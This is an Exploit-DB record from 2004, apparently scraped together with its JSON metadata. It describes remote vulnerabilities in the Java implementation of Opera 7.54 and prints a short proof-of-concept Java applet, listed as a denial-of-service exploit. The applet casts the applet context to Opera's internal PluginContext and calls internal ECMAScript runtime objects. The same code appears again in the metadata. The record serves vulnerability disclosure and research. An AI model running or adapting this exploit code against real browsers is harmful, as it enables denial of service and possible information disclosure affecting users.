opera Web browser 7.54 java implementation Multiple Vulnerabilities 2
2004-11-19T00:00:00
ID EDB-ID:24756 Type exploitdb Reporter Marc Schoenefeld Modified 2004-11-19T00:00:00
Description
Opera Web Browser 7.54 Java Implementation Multiple Remote Vulnerabilities (2). Dos exploit for linux platform
source: http://www.securityfocus.com/bid/11712/info
Multiple remote vulnerabilities reportedly affect the Opera Web Browser Java implementation. These issues are due to the insecure proprietary design of the Web browser's Java implementation.
These issues may allow an attacker to craft a Java applet that violate Sun's Java secure programming guidelines.
These issues may be leveraged to carry out a variety of unspecified attacks including sensitive information disclosure and denial of service attacks. Any successful exploitation would take place with the privileges of the user running the affected browser application.
Although only version 7.54 is reportedly vulnerable, it is likely that earlier versions are vulnerable to these issues as well.
import netscape.javascript.*;
import com.opera.*;
public class Opera754EcmaScriptApplet extends java.applet.Applet{
public void start()? {
PluginContext pc = (PluginContext)this.getAppletContext();
int jswin= pc.getJSWindow();
int esrun= pc.getESRuntime();
EcmaScriptObject eso4 = EcmaScriptObject.getObject (jswin,1);
try {
JSObject js = JSObject.getWindow(this);
System.out.println(js);
}
catch (Exception e) {
e.printStackTrace();
}
}
}
{"id": "EDB-ID:24756", "hash": "c18bde86e36b1891abe92be7a567be1e", "type": "exploitdb", "bulletinFamily": "exploit", "title": "opera Web browser 7.54 java implementation Multiple Vulnerabilities 2", "description": "Opera Web Browser 7.54 Java Implementation Multiple Remote Vulnerabilities (2). Dos exploit for linux platform", "published": "2004-11-19T00:00:00", "modified": "2004-11-19T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/24756/", "reporter": "Marc Schoenefeld", "references": [], "cvelist": [], "lastseen": "2016-02-02T23:57:33", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2016-02-02T23:57:33"}, "dependencies": {"references": [], "modified": "2016-02-02T23:57:33"}, "vulnersScore": 0.1}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/24756/", "sourceData": "source: http://www.securityfocus.com/bid/11712/info\r\n \r\nMultiple remote vulnerabilities reportedly affect the Opera Web Browser Java implementation. These issues are due to the insecure proprietary design of the Web browser's Java implementation.\r\n \r\nThese issues may allow an attacker to craft a Java applet that violate Sun's Java secure programming guidelines.\r\n \r\nThese issues may be leveraged to carry out a variety of unspecified attacks including sensitive information disclosure and denial of service attacks. Any successful exploitation would take place with the privileges of the user running the affected browser application.\r\n \r\nAlthough only version 7.54 is reportedly vulnerable, it is likely that earlier versions are vulnerable to these issues as well.\r\n\r\nimport netscape.javascript.*;\r\nimport com.opera.*;\r\n\r\npublic class Opera754EcmaScriptApplet extends java.applet.Applet{\r\n\r\n\tpublic void start()? {\r\n\t\tPluginContext pc = (PluginContext)this.getAppletContext();\r\n\r\n\t\tint jswin= pc.getJSWindow();\r\n\t\tint esrun= pc.getESRuntime();\r\n\t\tEcmaScriptObject eso4 = EcmaScriptObject.getObject (jswin,1);\r\n\t\ttry {\r\n\t\t\tJSObject js = JSObject.getWindow(this);\r\n\t\t\tSystem.out.println(js);\r\n\t\t}\r\n\t\tcatch (Exception e) {\r\n\t\te.printStackTrace();\r\n\t\t}\r\n\t}\r\n}", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
